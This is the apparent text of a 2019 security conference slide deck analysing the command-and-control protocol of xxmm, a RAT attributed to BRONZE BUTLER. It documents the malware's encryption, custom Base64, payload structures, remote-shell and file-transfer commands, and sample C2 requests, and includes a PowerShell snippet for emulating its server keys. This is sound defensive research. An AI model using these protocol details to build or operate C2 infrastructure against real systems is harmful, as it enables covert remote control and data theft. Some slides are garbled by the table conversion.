# Understanding Command and Control ###### - An Anatomy of xxmm Communication You Nakatsuru Counter Threat Unit 18/01/19 Japan Security Analyst Conference 2019 ----- ###### For analyst / researcher / developer • Provide information about modern C2 implementation including: • Encryption, compression, proprietary data structures • Provide a training material for C2 analysis • You can compare answers with your analysis result For incident responder • Tell you the importance of proxy log analysis and server investigation by public sector such as NPA, JPCERT/CC For red teamer • Provide knowledge of modern C2 implementation can be used to improve your penetration testing ----- ###### • Analysis Target: xxmm • xxmm Communication Analysis • xxmm Payload Analysis • Proof of Analysis ----- ## Analysis Target: xxmm ----- ##### xxmm (a.k.a. Minzen) ###### RAT malware used by BRONZE BUTLER • Good sample to understand modern command and control protocol • Uses HTTP/S with proxy • GET or POST request • Also supports TCP/UDP/ICMP • Uses encryption • RSA + onetime RC4 encryption in its communication • Uses proprietary data structures • Is capable to do various commands ----- ### Supported Features ###### Sleep ###### Drive info ###### File listing, upload, download, deletion ###### Directory creation ###### Process creation ###### Remote Shell ----- ### Is BRONZE BUTLER Still Active? ###### Seems to be inactive since early 2018 • Several Datper variants were observed from Nov, 2017 • e.g. 517b2695bbf7164bfb9cab0a133bb0b1aeb387cbb7f30aa01bf5d6f89cca4214 • Changed to use modified RC4 init as the following: ###### Seems to be inactive since early 2018 ----- ### File Information ###### • xxmm dropper (can be downloaded from VT Enterprise) SHA-256 hash 4d208c86c8331b7f1f6dd53f83af9ee4ec700a74792b419f663a3ce105d15d1c File type PE32 executable (GUI) Intel 80386, for MS Windows PE timestamp Thu May 12 02:44:45 2016 UTC First seen on VT PE32 executable (GUI) Intel 80386, for MS Windows • xxmm main module (will be loaded by the dropper) |SHA-256 hash|4d208c86c8331b7f1f6dd53f83af9ee4ec700a74792b419f663a3ce105d15d1c| |---|---| |Fil e type|PE32 executable (GUI) Intel 80386, for MS Windows| |PE timestamp|Thu May 12 02:44:45 2016 UTC| |First seen on VT|PE32 executable (GUI) Intel 80386, for MS Windows| |SHA-256 hash|714863d7d951e87c9cbde87882f9038db7ad7c8dacd29b2c12eb9ebca075ecb8| |---|---| |File type|PE32 executable (console) Intel 80386, for MS Windows| |PE timestamp|Thu May 12 02:44:51 2016 UTC| |Target binary|| ----- ### References / Tools ###### Useful for analysis • xxmm2_build.exe • https://www.virustotal.com/#/file/76340ef248c286270a07e2aee c7b1d6a007e77adde08dc6c1dcaa176aef9e1a8/detection • xxmm2_steganography.exe • https://www.virustotal.com/#/file/27f3a4c757f6e81a0546e47b9 7cbaab5e5e2b82a6ec2694641cd41ec47b90766/detection • wincrypto - Python module • https://github.com/crappycrypto/wincrypto • lznt1 - Python module • https://github.com/you0708/lznt1 ----- ### Unpacking main module ###### xxmm installer contains both 32-bit and 64-bit binaries ----- ### Decrypting All Encrypted Resources ###### Python scripting is an easy way to decrypt ###### [+] could not find rc4key, use default key: 1234 [+] saved unpacked xxmm as xxmm_dropper_unpacked_0.bin [+] saved unpacked xxmm as xxmm_dropper_unpacked_1.bin [+] saved unpacked xxmm as xxmm_dropper_unpacked_1_unpacked_0.bin [+] saved unpacked module as xxmm_dropper_unpacked_1_unpacked_1.bin [+] saved unpacked module as xxmm_dropper_unpacked_1_unpacked_2.bin [+] saved unpacked xxmm as xxmm_dropper_unpacked_1_unpacked_3.bin [+] saved unpacked xxmm as xxmm_dropper_unpacked_1_unpacked_0_unpacked_0.bin [+] saved unpacked xxmm as xxmm_dropper_unpacked_0_unpacked_0.bin [+] saved unpacked module as xxmm_dropper_unpacked_0_unpacked_1.bin [+] saved unpacked module as xxmm_dropper_unpacked_0_unpacked_2.bin [+] saved unpacked xxmm as xxmm_dropper_unpacked_0_unpacked_3.bin [+] saved unpacked xxmm as xxmm_dropper_unpacked_0_unpacked_0_unpacked_0.bin ###### [+] could not find rc4key, use default key: 1234 ----- ### Process of xxmm Main Module ----- ### 1. Loading Hardcoded Configuration |Process of xxmm main module|Col2|Col3| |---|---|---| |||Config data is XOR encoded with a key character "f"| |||| ----- ### 2. Command List Initialization ###### Process of xxmm main module ----- ### 3. Command & Control Thread ###### Process of xxmm main module |Col1|Col2|Col3|Col4| |---|---|---|---| ||||| ||||| |xxmm is capable to have 7 C2 server entries in its config|||| ----- ## xxmm Communication Analysis ----- ### Communication Protocol ###### xxmm supports various communication types |Type|Protocol|Description| |---|---|---| |0|HTTP|C2 communication| |1|HTTP|C2 communication| |2|HTTP|Download C2 server information| |4|TCP|C2 communication using proprietary TCP protocol| |5|UDP|C2 communication using proprietary UDP protocol| |6|ICMP|C2 communication using ICMP echo| ----- ###### xxmm Communication Analysis #### Type 2: C2 URL Download ----- ### GET Request to An Image File ###### Usual HTTP GET request to hardcoded URL |Col1|Col2|URL is specified by its config| |---|---|---| |GET /test/test.jpg HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1) Host: www.example.com Cache-Control: no-cache||| |||| |||| ----- ###### Encrypted Payload in The Image File |ntains C2 command (DownloadExecute/ChangeURL)|Col2|Col3|Col4| |---|---|---|---| |Markers are specified by its config|||| ||||| ||||| |Contains C2 command (DownloadExecute/ChangeURL)|Col2|Col3| |---|---|---| |Markers are specified by its config||| |Start marker xxmm|Encrypted payload|End marker mmxx| ###### Markers are specified by its config ----- ###### xxmm Communication Analysis #### Type 0,1: HTTP C2 Communication ----- ### C2 Communication using HTTP ###### xxmm communicates with specified C2 server ###### xxmm ###### C2 server ###### 3. Upload result ----- ### Ping/Pong ###### Checking C2 server • Ping/Pong communication will be performed before every C2 communication ``` GET /index.php?id0=39454275&id1=0&id2=f7547c11&id3=0&id6=2400000 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1) Host: www.example.com Cache-Control: no-cache ``` |Col1|HTTP/1.1 200 OK (snip.) Content-Length: 1 1| |---|---| |1|1| ----- ### 1, 3. Parameters of HTTP Request ``` GET /index.php?id0=b78503d0&id1=0&id2=f7547c11&id3=1&id4=AAAACAAA(snip.)gPcv^lQ!!& id6=2400000 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1) Host: www.example.com Cache-Control: no-cache ``` |Col1|Description|Ping|Col4|Command Result|Command Request|Col7| |---|---|---|---|---|---|---| |Param 0|Random hex string|8 digits hex string||8 digits hex string|8 digits hex string|| |Param 1|Constant value|0||0|0|| |Param 2|Client ID|8 digits h|ex string Will be|8 digits hex string POST data if the siz|8 digits h e is large|ex string| |Param 3|Request type|0||1|2|| |Param 4|Encrypted payload|||Base64 like string||| |Param 5|Unknown|?||?|?|| |Param 6|Current interval|2400000||2400000|2400000|| ----- ### 2. Receive command ###### HTTP Communication with given C2 server ----- ##### Encrypted Payload in GET Request ###### If RSA is enabled • LZNT1 compression • Performed using RtlCompressBuffer LZNT1 • Add 1 byte header • RC4 encryption using randomly generated one-time key RSA + RC4 • RC4 one-time key is encrypted with RSA public key • Base64 encoding with custom table • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu Custom ``` vwxyz0123456789+/= Base64 ↓ ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu vwxyz0123456789^`! ``` ----- ### One time Key Encryption ###### Using RSA key pair"s" • Encrypted one-time RC4 encryption key with server public key • RC4 encrypted + LZNT1 compressed payload Server Public key xxmm ###### C2 server |RSA key pair"s"|Col2|Col3|Col4|Col5| |---|---|---|---|---| |RSA key pair"s" • Encrypted one-time RC4 encryption key with server public key • RC4 encrypted + LZNT1 compressed payload Server Server Public key Private Key Client Client • Encrypted one-time RC4 encryption key with Private Key Public Key client public key • RC4 encrypted + LZNT1 compressed payload||||| |Server Public key Client • Private Key c||d payload Server Private Key Client ith Public Key||| ||• c|ith||| |||||| ----- ### Decrypting Encrypted Payload |Header length|RSA flag (0x00000001)|RSA encrypted RC4 key|RC4 encrypted payload| |---|---|---|---| |Compress flag|LZNT1 compressed/plain data| |---|---| ----- ##### Encrypted Payload in GET Request ###### If RSA is disabled • LZNT1 compression • Performed using RtlCompressBuffer LZNT1 • Add 1 byte header • RC4 encryption using default key RC4 • “1234” • Base64 encoding with custom table • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu Custom ``` vwxyz0123456789+/= Base64 ↓ ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu vwxyz0123456789^`! ``` ----- ### Decrypting Encrypted Payload |Header length|RSA flag (0x00000000)|RC4 encrypted payload| |---|---|---| |Compress flag|LZNT1 compressed/plain data| |---|---| ----- ## xxmm Payload Analysis ----- ### Data Format of Payload ###### • Need to extract “item” to understand the meaning of command |Header length|RSA flag (0x00000001)|Col3|RSA encrypted RC4 key|Col5|RC4 encrypted payload|Col7|Col8|Col9| |---|---|---|---|---|---|---|---|---| |||||||||| |Compress flag|LZNT1 compressed/plain data|||||||| |||||||||| |Payload header||Items header||Item||Item|Item|Item| ----- ### Item Structure ###### xxmm uses item list in their communication and configuration • Item format: Length ID Data • xxmm has various ID - difficult to enum them • e.g. decoded config |Length|ID|Data| |---|---|---| ----- ### Items Structure ###### Header + Item data Length Type Items data • Items format: • Type 0/10: data from server, Type 1/11: data from client, Type 2: configuration • e.g. decoded config |Length|Type|Items data| |---|---|---| ----- ### Analyzing Items/Item Structure ----- ### Payload Header ###### Offset Size ``` edc80b19 0x00 4 00000000 0x04 4 0172d218 0x08 1 0000007a 00000001 0x0C Variable 00000018… ``` |Offset|Size|Value|Description| |---|---|---|---| |0x00|4|Timestamp|Return value of GetTickCount| |0x04|4|Split count|Num of “items” blocks (starts from 0)| |0x08|1|1byte flag|0: Larger than max size 1: Less than max size| |0x0C|Variable|Items|Payload| ----- ### Command and Control ###### Using item structure Command request Item Item Item Payload Items ・・・ ###### Time header header 0x10001 API name 0x10002 Argument 1 stamp xxmm C2 server |Payload header|Items header|Item|Col4|Item|Col6|Item|・・・| |---|---|---|---|---|---|---|---| |||0x10001|API name|0x10002|Time stamp|Argument 1|| |Payload header|Items header|Item|Col4|Item|Col6|Item|Col8|・・・| |---|---|---|---|---|---|---|---|---| |||0x10001|API name|0x10002|Time stamp|0x20004|Status code|| ###### Copied from command items ----- ### RAT Command: xxmm API ###### • GetSystemInformation • DownloadExecute • ChangeUrl • ChangeTimeInterval • Uninstall • PlugIn • PowershellEncodedCommand • CreateProcessLow ----- ### RAT Command: Standard(?) API ###### • stdapi_execute_sleep • stdapi_execute_commandgroup • stdapi_syncshell_kill • stdapi_syncshell_control • stdapi_syncshell_open • stdapi_cmd_kill • stdapi_cmd_control • stdapi_cmd_open • stdapi_fs_search • stdapi_fs_file_upload • stdapi_fs_file_download • stdapi_fs_file_excute • stdapi_fs_GetLogicalDriver ###### • stdapi_fs_sha1 • stdapi_fs_md5 • stdapi_fs_file_move • stdapi_fs_file_expand_path • stdapi_fs_stat • stdapi_fs_separator • stdapi_fs_delete_file • stdapi_fs_delete_dir • stdapi_fs_mkdir • stdapi_fs_chdir • stdapi_fs_getwd • stdapi_fs_ls ----- ### Based on Metasploit API? |Col1|ame with Metasploit API| |---|---| |Same n|| ||| ###### Same name with Metasploit API ----- ### Command Details |Command|Argument 1|Argument 2|Argument 3|Result 1|Result 2|Result 3| |---|---|---|---|---|---|---| |GetSystemInformation|-|-|-|0x4001A|-|-| ||-|-|-|System info|-|-| |DownloadExecute|0x404D5|0x104D3|0x204D4|-|-|-| ||File data|File path|Show flag|-|-|-| |ChangeUrl|0x104F6|0x20529|-|-|-|-| ||C2 URL|Server No.|-|-|-|-| |ChangeTimeInterval|0x204F7|-|-|-|-|-| ||New interval|-|-|-|-|-| |Uninstall|0x20535|-|-|-|-|-| ||Run key flag|-|-|-|-|-| |PlugIn|0x404D5|-|-|-|-|-| ||file data|-|-|-|-|-| |PowershellEncodedCommand|0x104F8|-|-|-|-|-| ||Encoded PS command|-|-|-|-|-| |CreateProcessLow|0x1052D|0x2052E|-|-|-|-| ||Command line|Alt process|-|-|-|-| ----- ### Command Details |Command|Argument 1|Argument 2|Argument 3|Result 1|Result 2|Result 3| |---|---|---|---|---|---|---| |stdapi_fs_ls|0x104B0|-|-|0x104B1|0x104B2|0x800004C4| ||Target dir|-|-|File name|Full path|File stat| |stdapi_fs_getwd|-|-|-|0x104B0|-|-| ||-|-|-|Current dir|-|-| |stdapi_fs_chdir|0x104B0|-|-|-|-|-| ||Target dir|-|-|-|-|-| |stdapi_fs_mkdir|0x104B0|-|-|-|-|-| ||Target dir|-|-|-|-|-| |stdapi_fs_delete_dir|0x104B0|-|-|-|-|-| ||Target dir|-|-|-|-|-| |stdapi_fs_delete_file|0x104B2|-|-|-|-|-| ||Target file|-|-|-|-|-| |stdapi_fs_separator|-|-|-|0x1000A|-|-| ||-|-|-|Path separator|-|-| |stdapi_fs_stat|0x104B2|-|-|0x800004C4|-|-| ||Target file|-|-|File stat|-|-| ----- ### Command Details |Command|Argument 1|Argument 2|Argument 3|Result 1|Result 2|Result 3| |---|---|---|---|---|---|---| |stdapi_fs_file_expand_path|0x104B2|-|-|0x104B2|-|-| ||Target path|-|-|Full path|-|-| |stdapi_fs_md5|0x104B2|-|-|0x104B1|-|-| ||Target path|-|-|MD5 digest|-|-| |stdapi_fs_sha1|0x104B2|-|-|0x104B1|-|-| ||Target path|-|-|SHA-1 digest|-|-| |stdapi_fs_GetLogicalDriver|-|-|-|0x104B2|0x204D2|-| ||-|-|-|Drive root|Drive type|-| |stdapi_fs_file_execute|0x104D3|0x204D4|-|-|-|-| ||Command line|Show flag|-|-|-|-| |stdapi_fs_file_download|0x104B2|0x104B2|-|0x104B2|0x104B2|0x404D5| ||Target path|Unknown|-|File path|Unknown|File data| |stdapi_fs_file_upload|0x104B2|0x104B2|0x404D5|0x104B2|0x104B2|-| ||Target path|Unknown|File data|File path|Unknown|-| |stdapi_fs_search|0x104D0|0x104CF|0x804CE|0x104B2|0x104B1|0x204B4| ||Target path|Target filename|Recursive flag|Dir|Filename|File size| ----- ### Command Details |Command|Argument 1|Argument 2|Argument 3|Result 1|Result 2|Result 3| |---|---|---|---|---|---|---| |stdapi_cmd_open|0x104D3|0x2050A|-|0x2050A|-|-| ||Alt shell|Terminate flag|-|PID|-|-| |stdapi_cmd_control|0x404D6|-|-|0x404D6|-|-| ||Shell command|-|-|Output|-|-| |stdapi_cmd_kill|-|-|-|-|-|-| ||-|-|-|-|-|-| |stdapi_syncshell_open|0x104D3|-|-|-|-|-| ||Alt shell|-|-|-|-|-| |stdapi_syncshell_control|0x404D6|-|-|0x404d7|-|-| ||Shell command|-|-|Output|-|-| |stdapi_syncshell_kill|-|-|-|-|-|-| ||-|-|-|-|-|-| |stdapi_execute_commandgroup|0x404D8|-|-|-|-|-| ||Command group|-|-|-|-|-| |stdapi_execute_sleep|0x204D9|-|-|-|-|-| ||Sleep time|-|-|-|-|-| ----- ### Analyzing Arguments ###### Check getting item function |• e.g.|ChangeUrl command| |---|---| ||e several function call arse arguments mmand function| |There ar to p in co|| ||| ###### There are several function call to parse arguments in command function ----- ### e.g. File Uploading ###### Request to upload C:¥hoge.txt Command request Item Item Item Item Payload Items ``` 0x10001 0x10002 0x104B2 0x104B2 header header 'stdapi_fs_file_download' Timestamp u'C:¥hoge.txt' '' AAAAiAAAAAFg`y7o2T7BvTFDZDWFuR0Uuu7rlk0uUUytKzrp6Mxy`^AfuAHr1a(snip.)RHJp6p8 qQ5LppSwF4HoD4SRS3i8D5zMmHIxo9N1jtk89i992GlvEfWr1t57gl0LTZQXVihmeedUNbI! xxmm C2 server Item Item Item Item Item Item Payload Items 0x10001 0x10002 0x20004 0x104B2 0x104B2 0x404D5 header header 'stdapi_fs_file Time Status code u'C:¥hoge.txt' '' File data _download' stamp GET /index.php?id0=d65d4f8a&id1=0&id2=f7547c11&id3=1&id4=AAAAiAAA(snip.)Izxj4ER6A^Dg!!&id6=10000 ``` |Payload header|Items header|Item|Item|Item|Item| |---|---|---|---|---|---| |||0x10001|0x10002|0x104B2|0x104B2| |||'stdapi_fs_file_download'|Timestamp|u'C:¥hoge.txt'|''| |Payload header|Items header|Item|Item|Item|Item|Item|Item| |---|---|---|---|---|---|---|---| |||0x10001|0x10002|0x20004|0x104B2|0x104B2|0x404D5| |||'stdapi_fs_file _download'|Time stamp|Status code|u'C:¥hoge.txt'|''|File data| ----- ### e.g. Remote Shell ###### To execute 'ipconfig' Command request Payload Items Item Item header header 0x10001 'stdapi_cmd_open' 0x10002 Timestamp ``` AAAAiAAAAAEmb`Wsg0WNLPFrSlzQT9Dd7lHE(snip.)sUsgDpsHqMRYh97zmm0lPnMW^utiDGkFFbNIpgva4QHcNx Payload Items Item Item Item header header 0x10001 'stdapi_cmd_open' 0x10002 Timestamp 0x20004 Status code GET /index.php?id0=55243eab&id1=0&id2=f7547c11&id3=1&id4=AAAAiAAAAAGiI(snip.)uBRuYfmCLbo!&id6=10000 Command request xxmm C2 server Payload Items Item Item Item header header 0x10001 'stdapi_cmd_control' 0x10002 Timestamp 0x404D6 'ipconfig' AAAAiAAAAAFWzEmlvPSj8KASo0uPFhrzCEM5(snip.)haf6XHV8jpRQcXyU71sI`6Ul2MbbVvBpXGdaQuXZ3BlHl7 Payload Items Item Item Item Item header header 0x10001 'stdapi_cmd_control' 0x10002 Timestamp 0x20004 Status code 0x404D6 output POST /index php?id0=44be644f&id1=0&id2=f7547c11&id3=1&id6=10000, id4=AAAAiAAAAAF(snip.)HiNsLOaIMa3 ``` |Payload header|Items header|Item|Col4|Item|Col6| |---|---|---|---|---|---| |||0x10001|'stdapi_cmd_open'|0x10002|Timestamp| |Payload header|Items header|Item|Col4|Item|Col6|Item|Col8| |---|---|---|---|---|---|---|---| |||0x10001|'stdapi_cmd_open'|0x10002|Timestamp|0x20004|Status code| |Payload header|Items header|Item|Col4|Item|Col6|Item|Col8| |---|---|---|---|---|---|---|---| |||0x10001|'stdapi_cmd_control'|0x10002|Timestamp|0x404D6|'ipconfig'| |Payload header|Items header|Item|Col4|Item|Col6|Item|Col8|Item|Col10| |---|---|---|---|---|---|---|---|---|---| |||0x10001|'stdapi_cmd_control'|0x10002|Timestamp|0x20004|Status code|0x404D6|output| ----- ## Proof of Analysis ----- ### C2 Emulation Environment ----- ### Base Provider Key BLOBs ###### RSA key format can be imported by CryptImportKey API • See https://docs.microsoft.com/en-us/windows/desktop/seccrypto/base-provider-key-blobs • We can create the key pair using PowerShell commands ``` Add-Type -AssemblyName System.Security $RSA = New-Object System.Security.Cryptography.RSACryptoServiceProvider Set-Content "rsa_server_public_key.bin" -Value $RSA.ExportCspBlob($False) -Encoding Byte Set-Content "rsa_server_private_key.bin" -Value $RSA.ExportCspBlob($True) -Encoding Byte $RSA2 = New-Object System.Security.Cryptography.RSACryptoServiceProvider Set-Content "rsa_client_public_key.bin" -Value $RSA2.ExportCspBlob($False) -Encoding Byte Set-Content "rsa_client_private_key.bin" -Value $RSA2.ExportCspBlob($True) -Encoding Byte ``` |Add-Type -AssemblyName System.Security $RSA = New-Object System.Security.Cryptography.RSACryptoServiceProv|Col2|Col3| |---|---|---| ||Add-Type -AssemblyName System.Security $RSA = New-Object System.Security.Cryptography.RSACryptoServiceProv|| ``` Add-Type -AssemblyName System.Security $RSA = New-Object System.Security.Cryptography.RSACryptoServiceProvider ``` ----- ### Captured Packet ###### "dir" command execution ----- -----